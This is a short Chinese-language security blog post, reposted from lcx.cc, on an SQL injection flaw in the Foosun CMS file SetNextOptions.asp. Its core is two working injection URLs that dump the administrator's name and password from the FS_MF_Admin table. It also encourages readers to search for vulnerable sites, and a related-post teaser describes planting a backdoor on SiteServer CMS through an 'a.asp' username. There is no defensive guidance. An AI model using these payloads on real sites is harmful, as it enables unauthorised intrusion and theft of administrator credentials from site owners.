foosun (风讯) 最新注入漏洞

admin 2021年4月3日19:43:43评论44 views字数 585阅读1分57秒阅读模式

    风讯foosun的注册文件存在漏洞,可以暴管理员帐号和密码。

漏洞文件:

    http://www.xxx.com/user/SetNextOptions.asp

利用简单的方法:

暴管理员帐号:

    http://www.xxx.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

暴管理员密码:

    http://www.xxx.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin

关键字:

    自己找,网络上很多的。

文章来源于lcx.cc:foosun (风讯) 最新注入漏洞

相关推荐: Siteserver CMS 最新批量拿站 0DAY

    注册一个 a.asp 的用户,登陆后上传改名字的后门就行了。     注册地址:htpp://lcx.cc/UserCenter/register.aspx     后门路径:https://lcx.cc/UserFiles/a.asp/a.jpg  …

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:43:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   foosun (风讯) 最新注入漏洞http://cn-sec.com/archives/324614.html

发表评论

匿名网友 填写信息